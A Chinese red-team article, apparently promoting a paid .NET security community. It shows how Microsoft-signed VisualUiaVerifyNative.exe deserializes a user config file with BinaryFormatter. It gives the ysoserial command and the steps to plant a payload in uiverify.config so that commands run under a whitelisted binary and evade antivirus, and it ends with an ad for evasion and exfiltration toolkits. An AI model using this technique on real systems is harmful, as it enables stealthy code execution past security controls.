.NET 白名单文件通过反序列化执行系统命令

在日常的红队行动中，利用微软签名的白名单文件来绕过防护措施是一种常见的行为，有些场景下红队通过利用系统白名单文件加载反序列化漏洞的方式执行恶意指令。

VisualUiaVerifyNative.exe 是一款具备微软签名的可执行文件，属于Microsoft UI Automation框架的一部分，最初设计用于帮助开发人员验证UI自动化的状态，一般在 Microsoft Windows SDK（Windows Kits）包中，比如路径：Windows Kits10bin10.0.22621.0x64UIAVerify，该工具通常依赖于以下两个重要的动态链接库。

2.1 UIAComWrapper

UIAComWrapper.dll，该 DLL 文件封装了 UI Automation COM 接口，用于简化与 UI Automation 元素的交互。UI Automation 是一种微软提供的技术，允许自动化工具控制、监视和测试 Windows 应用程序的用户界面。UIAComWrapper.dll 使 VisualUIAVerifyNative.exe 可以使用 .NET 代码与 UI Automation API 进行交互。

2.2 WUIATestLibrary

WUIATestLibrary.dll 提供了一些专门用于 UI 自动化测试的库函数，主要支持自动化测试中的通用任务，例如自动化 UI 控件的查找、状态验证和操作。VisualUIAVerifyNative.exe 依赖于此库来运行不同的 UI 验证和测试场景。

这些依赖库的主要作用是为 VisualUIAVerifyNative.exe 提供接口和功能支持，使其能够与 Windows 应用程序的 UI 自动化框架进行通信，并通过自动化的方式验证和测试界面元素。

由于VisualUiaVerifyNative具备了微软官方签名的文件，因此，从反病毒软件的视角看属于白名单应用程序，常常可以绕过许多基于签名的安全防护措施。

我们使用dnspy打开VisualUiaVerifyNative文件的入口方法Main，发现调用了MainWindow类，具体代码如下所示。

private static void Main(string[] args)
{
try
{
Debug.AutoFlush = true;
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new MainWindow(args));
Automation.RemoveAllEventHandlers();
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
            }
}

MainWindow类的初始化方法中，有一个至关重要的函数ApplicationStateDeserialize负责反序列化配置文件中的数据。如下图所示

进入此方法内部，发现打开读取了一个名为uiverify.config的文件，位于用户的AppData目录中，代码如下所示。

private void ApplicationStateDeserialize(){
    this._configFile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "uiverify.config";
    if (File.Exists(this._configFile))
    {
        Stream stream = File.Open(this._configFile, FileMode.Open);
        BinaryFormatter binaryFormatter = new BinaryFormatter();
        this._applicationState = (ApplicationState)binaryFormatter.Deserialize(stream);
        stream.Close();
    }
}

最核心的是调用了BinaryFormatter类反序列化内容，攻击者可以通过精心构造的payload欺骗反序列化过程，加载恶意代码。在代码中，binaryFormatter.Deserialize(stream)这一行正是漏洞的触发点，它会反序列化uiverify.config文件中的数据，并将其载入到_applicationState中。

第1步使用ysoserial.exe工具生成一个恶意的序列化payload。在这里，我们利用了BinaryFormatter格式，并选择TextFormattingRunProperties作为触发器，执行命令notepad。

ysoserial.exe -f BinaryFormatter -g TextFormattingRunProperties -o raw -c "notepad" > Roaminguiverify.config

这会生成一个二进制格式的恶意payload，并将其保存为Roaminguiverify.config文件，内容如下图所示。

第2步，将生成的Roaminguiverify.config文件写入到当前用户目录，比如C:UsersAdministratorAppDataRoaminguiverify.config。这个配置文件是VisualUiaVerifyNative在启动时会自动读取的文件，因此一旦写入恶意数据，运行该工具时会自动触发反序列化漏洞。

第3步，当VisualUiaVerifyNative运行时，它会尝试从Roaminguiverify.config文件中反序列化数据，并因此执行植入的恶意命令。在本例中，notepad.exe会在系统上启动，表明命令执行成功。

综上，VisualUiaVerifyNative是一款具备微软白名单的可执行文件，用于基于Microsoft UI Automation框架进行应用测试。然而，通过对其配置文件的精心操作，攻击者可以非法使用其功能来触发反序列化漏洞，执行任意代码。文章中涉及的工具和PDF文档已经打包在星球，感兴趣的朋友可以加入自取。

从漏洞分析到安全攻防，我们涵盖了.NET安全各个关键方面，为您呈现最新、最全面的.NET安全知识，下面是公众号发布的精华文章集合，推荐大家阅读！

目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一，从.NET Framework到.NET Core，从Web应用到PC端软件应用，无论您是初学者还是经验丰富的开发人员，都能在这里找到对应的安全指南和最佳实践。

星球汇聚了各行业安全攻防技术大咖，并且每日分享.NET安全技术干货以及交流解答各类技术等问题，社区中发布很多高质量的.NET安全资源，可以说市面上很少见，都是干货。

星球文化始终认为授人以鱼不如授人以渔！加入星球后可以跟星主和嘉宾们一对一提问交流，20+个专题栏目涵盖了点、线、面、体等知识面，助力师傅们快速成长！其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    我们倾力打造专刊、视频等配套学习资源，循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

我们还有一个会员专属的内部星球陪伴群，加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问，以获取帮助迅速解决问题。

为了助力大家在2024国家级hvv演练中脱颖而出，我们特别整理出了一套涵盖dotNet安全矩阵星球的八大.NET相关方向工具集。

.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输

这些阶段所涉及的工具集不仅代表了当前.NET安全领域的最前沿技术，更是每一位网络安全爱好者不可或缺的实战利器。